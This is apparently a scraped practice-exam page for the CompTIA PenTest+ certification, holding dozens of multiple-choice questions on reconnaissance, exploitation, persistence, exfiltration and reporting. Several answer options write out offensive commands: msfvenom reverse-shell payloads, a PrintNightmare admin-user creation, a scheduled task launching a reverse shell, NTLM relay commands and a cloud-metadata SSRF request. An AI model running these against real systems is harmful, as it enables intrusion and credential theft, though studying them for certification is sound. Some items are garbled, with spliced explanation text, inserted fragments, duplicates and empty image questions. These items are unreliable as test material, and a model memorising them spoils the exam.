Special Summer Sale Limited Time Flat 70% Discount offer - Ends in 0d 00h 00m 00s - Coupon code: 70spcl

CompTIA PT0-003 CompTIA PenTest+ Exam Exam Practice Test

Page: 1 / 23
Total 233 questions

CompTIA PenTest+ Exam Questions and Answers

Question 1

A tester performs a vulnerability scan and identifies several outdated libraries used within the customer SaaS product offering. Which of the following types of scans did the tester use to identify the libraries?

Options:

A.

IAST

B.

SBOM

C.

DAST

D.

SAST

Question 2

Which of the following post-exploitation activities allows a penetration tester to maintain persistent access in a compromised system?

Options:

A.

Creating registry keys

B.

Installing a bind shell

C.

Executing a process injection

D.

Setting up a reverse SSH connection

Question 3

A penetration tester has discovered sensitive files on a system. Assuming exfiltration of the files is part of the scope of the test, which of the following is most likely to evade DLP systems?

Options:

A.

Encoding the data and pushing through DNS to the tester's controlled server.

B.

Padding the data and uploading the files through an external cloud storage service.

C.

Obfuscating the data and pushing through FTP to the tester's controlled server.

D.

Hashing the data and emailing the files to the tester's company inbox.

Question 4

Which of the following is a term used to describe a situation in which a penetration tester bypasses physical access controls and gains access to a facility by entering at the same time as an employee?

Options:

A.

Badge cloning

B.

Shoulder surfing

C.

Tailgating

D.

Site survey

Question 5

A penetration tester discovers evidence of an advanced persistent threat on the network that is being tested. Which of the following should the tester do next?

Options:

A.

Report the finding.

B.

Analyze the finding.

C.

Remove the threat.

D.

Document the finding and continue testing.

Question 6

A penetration tester gains access to a Windows machine and wants to further enumerate users with native operating system credentials. Which of the following should the tester use?

Options:

A.

route

B.

nbtstat

C.

net

D.

whoami

Question 7

A penetration tester downloads a JAR file that is used in an organization's production environment. The tester evaluates the contents of the JAR file to identify potentially vulnerable components that can be targeted for exploit. Which of the following describes the tester's activities?

Options:

A.

SAST

B.

SBOM

C.

ICS

D.

SCA

Question 8

Which of the following techniques is the best way to avoid detection by data loss prevention tools?

Options:

A.

Encoding

B.

Compression

C.

Encryption

D.

Obfuscation

Question 9

While conducting an assessment, a penetration tester identifies details for several unreleased products announced at a company-wide meeting.

Which of the following attacks did the tester most likely use to discover this information?

Options:

A.

Eavesdropping

B.

Bluesnarfing

C.

Credential harvesting

D.

SQL injection attack

Question 10

During an assessment, a penetration tester runs the following command:

setspn.exe -Q /

Which of the following attacks is the penetration tester preparing for?

Options:

A.

LDAP injection

B.

Pass-the-hash

C.

Kerberoasting

D.

Dictionary

Question 11

A penetration tester wants to check the security awareness of specific workers in the company with targeted attacks. Which of the following attacks should the penetration tester perform?

Options:

A.

Phishing

B.

Tailgating

C.

Whaling

D.

Spear phishing

Question 12

Which of the following is the most efficient way to infiltrate a file containing data that could be sensitive?

Options:

A.

Use steganography and send the file over FTP

B.

Compress the file and send it using TFTP

C.

Split the file in tiny pieces and send it over dnscat

D.

Encrypt and send the file over HTTPS

Question 13

During an assessment, a penetration tester manages to get RDP access via a low-privilege user. The tester attempts to escalate privileges by running the following commands:

Import-Module .\PrintNightmare.ps1

Invoke-Nightmare -NewUser "hacker" -NewPassword "Password123!" -DriverName "Print"

The tester attempts to further enumerate the host with the new administrative privileges by using the runas command. However, the access level is still low. Which of the following actions should the penetration tester take next?

Options:

A.

Log off and log on with "hacker".

B.

Attempt to add another user.

C.

Bypass the execution policy.

D.

Add a malicious printer driver.

Question 14

A penetration tester has found a web application that is running on a cloud virtual machine instance. Vulnerability scans show a potential SSRF for the same application URL path with an injectable parameter. Which of the following commands should the tester run to successfully test for secrets exposure exploitability?

Options:

A.

curl ?param=http://169.254.169.254/latest/meta-data/

B.

curl '?param=http://127.0.0.1/etc/passwd'

C.

curl '?param=: This tests for XSS, not SSRF.

127.0.0.1: This is a generic loopback address and does not specifically test for metadata access in a cloud environment.

Using curl ?param=http://169.254.169.254/latest/meta-data/ is the correct approach to test for SSRF vulnerabilities in cloud environments to potentially expose secrets.

=================

Question 15

During a penetration test, a junior tester uses Hunter.io for an assessment and plans to review the information that will be collected. Which of the following describes the information the junior tester will receive from the Hunter.io tool?

Options:

A.

A collection of email addresses for the target domain that is available on multiple sources on the internet

B.

DNS records for the target domain and subdomains that could be used to increase the external attack surface

C.

Data breach information about the organization that could be used for additional enumeration

D.

Information from the target's main web page that collects usernames, metadata, and possible data exposures

Question 16

A penetration tester needs to exploit a vulnerability in a wireless network that has weak encryption to perform traffic analysis and decrypt sensitive information. Which of the following techniques would best allow the penetration tester to have access to the sensitive information?

Options:

A.

Bluejacking

B.

SSID spoofing

C.

Packet sniffing

D.

ARP poisoning

Question 17

During a penetration testing engagement, a tester targets the internet-facing services used by the client. Which of the following describes the type of assessment that should be considered in this scope of work?

Options:

A.

Segmentation

B.

Mobile

C.

External

D.

Web

Question 18

A penetration tester needs to test a very large number of URLs for public access. Given the following code snippet:

1 import requests

2 import pathlib

3

4 for url in pathlib.Path("urls.txt").read_text().split("\n"):

5 response = requests.get(url)

6 if response.status == 401:

7 print("URL accessible")

Which of the following changes is required?

Options:

A.

The condition on line 6

B.

The method on line 5

C.

The import on line 1

D.

The delimiter in line 3

Question 19

During a red-team exercise, a penetration tester obtains an employee's access badge. The tester uses the badge's information to create a duplicate for unauthorized entry. Which of the following best describes this action?

Options:

A.

Smurfing

B.

Credential stuffing

C.

RFID cloning

D.

Card skimming

Question 20

A penetration tester has adversely affected a critical system during an engagement, which could have a material impact on the organization. Which of the following should the penetration tester do to address this issue?

Options:

A.

Restore the configuration.

B.

Perform a BIA.

C.

Follow the escalation process.

D.

Select the target.

Question 21

In a file stored in an unprotected source code repository, a penetration tester discovers the following line of code:

sshpass -p donotchange ssh admin@192.168.6.14

Which of the following should the tester attempt to do next to take advantage of this information? (Select two).

Options:

A.

Use Nmap to identify all the SSH systems active on the network.

B.

Take a screen capture of the source code repository for documentation purposes.

C.

Investigate to find whether other files containing embedded passwords are in the code repository.

D.

Confirm whether the server 192.168.6.14 is up by sending ICMP probes.

E.

Run a password-spraying attack with Hydra against all the SSH servers.

F.

Use an external exploit through Metasploit to compromise host 192.168.6.14.

Question 22

A company wants to perform a BAS (Breach and Attack Simu-lation) to measure the efficiency of the corporate security controls. Which of the following would most likely help the tester with simple command examples?

Options:

A.

Infection Monkey

B.

Exploit-DB

C.

Atomic Red Team

D.

Mimikatz

Question 23

A penetration tester gains shell access to a Windows host. The tester needs to permanently turn off protections in order to install additional payload. Which of the following commands is most appropriate?

Options:

A.

sc config start=disabled

B.

sc query state= all

C.

pskill

D.

net config

Question 24

Which of the following elements in a lock should be aligned to a specific level to allow the key cylinder to turn?

Options:

A.

Latches

B.

Pins

C.

Shackle

D.

Plug

Question 25

During a red-team exercise, a penetration tester obtains an employee's access badge. The tester uses the badge’s information to create a duplicate for unauthorized entry.

Which of the following best describes this action?

Options:

A.

Smurfing

B.

Credential stuffing

C.

RFID cloning

D.

Card skimming

Question 26

During an assessment, a penetration tester gains access to one of the internal hosts. Given the following command:

schtasks /create /sc onlogon /tn "Windows Update" /tr "cmd.exe /c reverse_shell.exe"

Which of the following is the penetration tester trying to do with this code?

Options:

A.

Enumerate the scheduled tasks

B.

Establish persistence

C.

Deactivate the Windows Update functionality

D.

Create a binary application for Windows System Updates

Question 27

A penetration tester is attempting to exfiltrate sensitive data from a client environment without alerting the client's blue team. Which of the following exfiltration methods most likely remain undetected?

Options:

A.

Cloud storage

B.

Email

C.

Domain Name System

D.

Test storage sites

Question 28

A tester compromises a target host and then wants to maintain persistent access. Which of the following is the best way for the attacker to accomplish the objective?

Options:

A.

Configure and register a service.

B.

Install and run remote desktop software.

C.

Set up a script to be run when users log in.

D.

Perform a kerberoasting attack on the host.

Question 29

A penetration tester has been provided with only the public domain name and must enumerate additional information for the public-facing assets.

INSTRUCTIONS

Select the appropriate answer(s), given the output from each section.

Output 1

Question # 29

Question # 29

Question # 29

Question # 29

Question # 29

Question # 29

Options:

Question 30

A penetration tester runs a vulnerability scan that identifies several issues across numerous customer hosts. The executive report outlines the following:

Question # 30

The client is concerned about the availability of its consumer-facing production application. Which of the following hosts should the penetration tester select for additional manual testing?

Options:

A.

Server 1

B.

Server 2

C.

Server 3

D.

Server 4

Question 31

A penetration tester is conducting a vulnerability scan. The tester wants to see any vulnerabilities that may be visible from outside of the organization. Which of the following scans should the penetration tester perform?

Options:

A.

SAST

B.

Sidecar

C.

Unauthenticated

D.

Host-based

Question 32

A penetration tester established an initial compromise on a host. The tester wants to pivot to other targets and set up an appropriate relay. The tester needs to enumerate through the compromised host as a relay from the tester's machine. Which of the following commands should the tester use to do this task from the tester's host?

Options:

A.

attacker_host$ nmap -sT | nc -n 22

B.

attacker_host$ mknod backpipe p attacker_host$ nc -l -p 8000 | 0 80 | tee backpipe

C.

attacker_host$ nc -nlp 8000 | nc -n attacker_host$ nmap -sT 127.0.0.1 8000

D.

attacker_host$ proxychains nmap -sT

Question 33

A penetration tester is getting ready to conduct a vulnerability scan as part of the testing process. The tester will evaluate an environment that consists of a container orchestration cluster. Which of the following tools should the tester use to evaluate the cluster?

Options:

A.

Trivy

B.

Nessus

C.

Grype

D.

Kube-hunter

Question 34

During a security assessment of an e-commerce website, a penetration tester wants to exploit a vulnerability in the web server’s input validation that will allow unauthorized transactions on behalf of the user. Which of the following techniques would most likely be used for that purpose?

Options:

A.

Privilege escalation

B.

DOM injection

C.

Session hijacking

D.

Cross-site scripting

Question 35

A tester obtains access to an endpoint subnet and wants to move laterally in the network. Given the following output:

kotlin

Copy code

Nmap scan report for some_host

Host is up (0.01 latency).

PORT STATE SERVICE

445/tcp open microsoft-ds

Host script results: smb2-security-mode: Message signing disabled

Which of the following command and attack methods is the most appropriate for reducing the chances of being detected?

Options:

A.

responder -T eth0 -dwv ntlmrelayx.py -smb2support -tf

B.

msf > use exploit/windows/smb/ms17_010_psexec msf > msf > run

C.

hydra -L administrator -P /path/to/passwdlist smb://

D.

nmap —script smb-brute.nse -p 445

Question 36

A penetration tester is ready to add shellcode for a specific remote executable exploit. The tester is trying to prevent the payload from being blocked by antimalware that is running on the target. Which of the following commands should the tester use to obtain shell access?

Options:

A.

msfvenom --arch x86-64 --platform windows --encoder x86-64/shikata_ga_nai --payload windows/bind_tcp LPORT=443

B.

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.100 LPORT=8000

C.

msfvenom --arch x86-64 --platform windows --payload windows/shell_reverse_tcp LHOST=10.10.10.100 LPORT=4444 EXITFUNC=none

D.

net user add /administrator | hexdump > payload

Question 37

A penetration tester runs a vulnerability scan that identifies several issues across numerous customer hosts. The executive report outlines the following information:

Server High-severity vulnerabilities

1. Development sandbox server 32

2. Back office file transfer server 51

3. Perimeter network web server 14

4. Developer QA server 92

The client is con ble monitoring mode using Aircrack-ng ch of the following hosts should the penetration tester select for additional manual testing?

Options:

A.

Server 1

B.

Server 2

C.

Server 3

D.

Server 4

Question 38

While performing reconnaissance, a penetration tester attempts to identify publicly accessible ICS (Industrial Control Systems) and IoT (Internet of Things) systems. Which of the following tools is most effective for this task?

Options:

A.

theHarvester

B.

Shodan

C.

Amass

D.

Nmap

Question 39

A penetration testing team needs to determine whether it is possible to disrupt the wireless communications for PCs deployed in the client's offices. Which of the following techniques should the penetration tester leverage?

Options:

A.

Port mirroring

B.

Sidecar scanning

C.

ARP poisoning

D.

Channel scanning

Question 40

A consultant starts a network penetration test. The consultant uses a laptop that is hardwired to the network to try to assess the network with the appropriate tools. Which of the following should the consultant engage first?

Options:

A.

Service discovery

B.

OS fingerprinting

C.

Host discovery

D.

DNS enumeration

Question 41

During a pre-engagement activity with a new customer, a penetration tester looks for assets to test. Which of the following is an example of a target that can be used for testing?

Options:

A.

API

B.

HTTP

C.

IPA

D.

ICMP

Question 42

During a web application assessment, a penetration tester identifies an input field that allows JavaScript injection. The tester inserts a line of JavaScript that results in a prompt, presenting a text box when browsing to the page going forward. Which of the following types of attacks is this an example of?

Options:

A.

SQL injection

B.

SSRF

C.

XSS

D.

Server-side template injection

Question 43

During the reconnaissance phase, a penetration tester collected the following information from the DNS records:

A-----> www

A-----> host

TXT --> vpn.comptia.org

SPF---> ip =2.2.2.2

Which of the following DNS records should be in place to avoid phishing attacks using spoofing domain techniques?

Options:

A.

MX

B.

SOA

C.

DMARC

D.

CNAME

Question 44

A penetration tester sets up a C2 (Command and Control) server to manage and control payloads deployed in the target network. Which of the following tools is the most suitable for establishing a robust and stealthy connection?

Options:

A.

ProxyChains

B.

Covenant

C.

PsExec

D.

sshuttle

Question 45

During host discovery, a security analyst wants to obtain GeoIP information and a comprehensive summary of exposed services. Which of the following tools is best for this task?

Options:

A.

WiGLE.net

B.

WHOIS

C.

theHarvester

D.

Censys.io

Question 46

Which of the following is most important when communicating the need for vulnerability remediation to a client at the conclusion of a penetration test?

Options:

A.

Articulation of cause

B.

Articulation of impact

C.

Articulation of escalation

D.

Articulation of alignment

Question 47

A penetration tester is working on a security assessment of a mobile application that was developed in-house for local use by a hospital. The hospital and its customers are very concerned about disclosure of information. Which of the following tasks should the penetration tester do first?

Options:

A.

Set up Drozer in order to manipulate and scan the application.

B.

Run the application through the mobile application security framework.

C.

Connect Frida to analyze the application at runtime to look for data leaks.

D.

Load the application on client-owned devices for testing.

Question 48

During an engagement, a penetration tester wants to enumerate users from Linux systems by using finger and rwho commands. However, the tester realizes these commands alone will not achieve the desired result. Which of the following is the best tool to use for this task?

Options:

A.

Nikto

B.

Burp Suite

C.

smbclient

D.

theHarvester

Question 49

A company hires a penetration tester to test the security of its wireless networks. The main goal is to intercept and access sensitive data.

Which of the following tools should the security professional use to best accomplish this task?

Options:

A.

Metasploit

B.

WiFi-Pumpkin

C.

SET

D.

theHarvester

E.

WiGLE.net

Question 50

A tester obtains access to an endpoint subnet and wants to move laterally in the network. Given the following Nmap scan output:

Nmap scan report for some_host

Host is up (0.01s latency).

PORT STATE SERVICE

445/tcp open microsoft-ds

Host script results:

smb2-security-mode: Message signing disabled

Which of the following command and attack methods is the most appropriate for reducing the chances of being detected?

Options:

A.

responder -I eth0 -dwv ntlmrelayx.py -smb2support -tf

B.

msf > use exploit/windows/smb/ms17_010_psexec

C.

hydra -L administrator -P /path/to/passwdlist smb://

D.

nmap --script smb-brute.nse -p 445

Question 51

A penetration tester gains access to a host but does not have access to any type of shell. Which of the following is the best way for the tester to further enumerate the host and the environment in which it resides?

Options:

A.

ProxyChains

B.

Netcat

C.

PowerShell ISE

D.

Process IDs

Question 52

During an assessment, a penetration tester obtains an NTLM hash from a legacy Windows machine. Which of the following tools should the penetration tester use to continue the attack?

Options:

A.

Responder

B.

Hydra

C.

BloodHound

D.

CrackMapExec

Question 53

During a security assessment, a penetration tester needs to exploit a vulnerability in a wireless network's authentication mechanism to gain unauthorized access to the network. Which of the following attacks would the tester most likely perform to gain access?

Options:

A.

KARMA attack

B.

Beacon flooding

C.

MAC address spoofing

D.

Eavesdropping

Question 54

During a penetration test, a tester attempts to pivot from one Windows 10 system to another Windows system. The penetration tester thinks a local firewall is blocking connections. Which of the following command-line utilities built into Windows is most likely to disable the firewall?

Options:

A.

certutil.exe

B.

bitsadmin.exe

C.

msconfig.exe

D.

netsh.exe

Question 55

A penetration tester finds it is possible to downgrade a web application's HTTPS connections to HTTP while performing on-path attacks on the local network. The tester reviews the output of the server response to:

curl -s -i https://internalapp/

HTTP/2 302

date: Thu, 11 Jan 2024 15:56:24 GMT

content-type: text/html; charset=iso-8659-1

location: /login

x-content-type-options: nosniff

server: Prod

Which of the following recommendations should the penetration tester include in the report?

Options:

A.

Add the HSTS header to the server.

B.

Attach the httponly flag to cookies.

C.

Front the web application with a firewall rule to block access to port 80.

D.

Remove the x-content-type-options header.

Question 56

A penetration tester performs a service enumeration process and receives the following result after scanning a server using the Nmap tool:

bash

PORT STATE SERVICE

22/tcp open ssh

25/tcp filtered smtp

111/tcp open rpcbind

2049/tcp open nfs

Based on the output, which of the following services provides the best target for launching an attack?

Options:

A.

Database

B.

Remote access

C.

Email

D.

File sharing

Question 57

During a security audit, a penetration tester wants to run a process to gather information about a target network's domain structure and associated IP addresses. Which of the following tools should the tester use?

Options:

A.

Dnsenum

B.

Nmap

C.

Netcat

D.

Wireshark

Question 58

A penetration tester is developing the rules of engagement for a potential client. Which of the following would most likely be a function of the rules of engagement?

Options:

A.

Testing window

B.

Terms of service

C.

Authorization letter

D.

Shared responsibilities

Question 59

A penetration tester needs to scan a remote infrastructure with Nmap. The tester issues the following command:

nmap 10.10.1.0/24

Which of the following is the number of TCP ports that will be scanned?

Options:

A.

256

B.

1,000

C.

1,024

D.

65,535

Question 60

A penetration tester is unable to identify the Wi-Fi SSID on a client’s cell phone.

Which of the following techniques would be most effective to troubleshoot this issue?

Options:

A.

Sidecar scanning

B.

Channel scanning

C.

Stealth scanning

D.

Static analysis scanning

Question 61

A previous penetration test report identified a host with vulnerabilities that was

successfully exploited. Management has requested that an internal member of the

security team reassess the host to determine if the vulnerability still exists.

Question # 61

Part 1:

. Analyze the output and select the command to exploit the vulnerable service.

Part 2:

. Analyze the output from each command.

· Select the appropriate set of commands to escalate privileges.

· Identify which remediation steps should be taken.

Question # 61

Options:

Question 62

You are a penetration tester running port scans on a server.

INSTRUCTIONS

Part 1: Given the output, construct the command that was used to generate this output from the available options.

Part 2: Once the command is appropriately constructed, use the given output to identify the potential attack vectors that should be investigated further.

If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

Question # 62

Question # 62

Options:

Question 63

As part of an engagement, a penetration tester wants to maintain access to a compromised system after rebooting. Which of the following techniques would be best for the tester to use?

Options:

A.

Establishing a reverse shell

B.

Executing a process injection attack

C.

Creating a scheduled task

D.

Performing a credential-dumping attack

Question 64

A penetration tester needs to collect information over the network for further steps in an internal assessment. Which of the following would most likely accomplish this goal?

Options:

A.

ntlmrelayx.py -t 192.168.1.0/24 -1 1234

B.

nc -tulpn 1234 192.168.1.2

C.

responder.py -I eth0 -wP

D.

crackmapexec smb 192.168.1.0/24

Question 65

Which of the following protocols would a penetration tester most likely utilize to exfiltrate data covertly and evade detection?

Options:

A.

FTP

B.

HTTPS

C.

SMTP

D.

DNS

Question 66

A penetration tester finished a security scan and uncovered numerous vulnerabilities on several hosts. Based on the targets' EPSS and CVSS scores, which of the following targets is the most likely to get attacked?

Options:

A.

Target 1: EPSS Score = 0.6 and CVSS Score = 4

B.

Target 2: EPSS Score = 0.3 and CVSS Score = 2

C.

Target 3: EPSS Score = 0.6 and CVSS Score = 1

D.

Target 4: EPSS Score = 0.4 and CVSS Score = 4.5

Load More PT0-003 Questions 
Page: 1 / 23
Total 233 questions